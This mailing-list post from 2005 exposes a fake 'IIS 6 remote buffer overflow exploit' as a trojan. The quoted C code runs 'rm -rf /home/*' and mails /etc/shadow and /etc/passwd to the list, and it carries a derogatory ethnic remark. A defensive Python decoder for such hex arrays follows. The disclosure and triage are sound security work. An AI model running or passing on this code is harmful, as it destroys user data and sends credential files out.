Date: Tue Apr 19 02:55:24 2005
From: iago at valhallalegends.com (Ron)
Subject: IIS 6 Remote Buffer Overflow Exploit

haha, nice:

/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe
cat /etc/shadow |mail full-disclosure@...ts.grok.org.uk
cat /etc/passwd |mail full-disclosure@...ts.grok.org.uk

lol @ anybody who does it. 

Day Jay wrote:

>/* Proof of concept code
>   Please don't send us e-mails
>   asking us "how to hack" because
>   we will be forced to skullfsck you.
>
>DISCLAIMER:
>!!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
>
>   IIS 6 Buffer Overflow Exploit
>
>   BUG: inetinfo.exe improperly bound checks
>   http requests sent longer than 6998 chars.
>   Can get messy but enough testing, and we have
>   found a way in.
>
>   VENDOR STATUS: Notified
>   FIX: In process
>
>   Remote root.
>
>   eg.
>   #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
>    + Connecting to host...
>    + Connected.
>    + Inserting Shellcode...
>    + Done...
>    + Spawining shell..
>
>    Microsoft Windows XP [Version 5.1.2600]
>   (C) Copyright 1985-2001 Microsoft Corp.
>   C:\>
>
>
>
>*/
>char shellcode[] =
>"\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
>"\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
>"\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
>"\x72\x3b\x65\x63\x68\x6f\x20\x62"
>"\x6c\x34\x63\x6b\x68\x34\x74\x2c"
>"\x68\x65\x68\x65";
>
>char launcher [] =
>"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
>"\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
>"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
>"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
>"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
>"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
>
>char netcat_shell [] =
>"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
>"\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
>"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
>"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
>"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
>"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
>
>
>main()
>{
>
>//Section Initialises designs implemented by mexicans
>//Imigrate
>system(launcher);
>system(netcat_shell);
>system(shellcode);
>
>//int socket = 0;
>//double long port = 0.0;
>
>//#DEFINE port host address
>//#DEFINE number of inters
>//#DEFINE gull eeuEE
>
> //     for(int j; j < 30; j++)
>        {
>        //Find socket remote address fault
>        printf(".");
>        }
>//overtake inetinfo here IIS_666666^
>return 0;
>}
>
>
>
>
>		
>
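Ron's reading of the quoted arrays can be reproduced without compiling or running the file. The following is an added example, not part of the original post or of the quoted code: a Python script that expands `\xNN` string arrays found in C source and reports which ones are plain printable text passed to `system()` or `popen()`. The sample input is constructed and harmless, and the names `triage`, `decode` and `SAMPLE` are this example's own.

```python
import re

# Constructed sample, not the quoted code: one array that decodes to a
# harmless shell command and one that holds non-text bytes.
SAMPLE = r'''
char shellcode[] =
"\x65\x63\x68\x6f\x20\x63\x6f\x6e"
"\x73\x74\x72\x75\x63\x74\x65\x64";
char stub [] = "\x90\x90\xcc\xeb\xfe";
main() { system(shellcode); }
'''

# char NAME[] = "..." "..." ;   (adjacent literals are concatenated by C)
ARRAY = re.compile(r'char\s+(\w+)\s*\[\s*\]\s*=\s*((?:"(?:[^"\\]|\\.)*"\s*)+);')
LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"')
HEX = re.compile(r'\\x([0-9a-fA-F]{1,2})')
SYSTEM = re.compile(r'\b(?:system|popen)\s*\(\s*(\w+)')

def decode(literals):
    """Join adjacent C string literals and expand \\xNN escapes to bytes."""
    body = "".join(LITERAL.findall(literals))
    text = HEX.sub(lambda m: chr(int(m.group(1), 16)), body)
    return text.encode("latin-1", "replace")

def triage(source):
    """Return {name: (bytes, is_text, passed_to_shell)} for each char array."""
    shelled = set(SYSTEM.findall(source))
    report = {}
    for name, literals in ARRAY.findall(source):
        data = decode(literals)
        # Real machine code is almost never 100% printable ASCII.
        is_text = bool(data) and all(32 <= b < 127 or b in (9, 10, 13) for b in data)
        report[name] = (data, is_text, name in shelled)
    return report

if __name__ == "__main__":
    for name, (data, is_text, shelled) in triage(SAMPLE).items():
        flag = "SHELL COMMAND" if is_text and shelled else "review"
        print(f"{name:10} {flag:14} {data!r}")
```

An array that is entirely printable and is handed to `system()` is a command line for the machine running the program, not a payload for a remote target.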
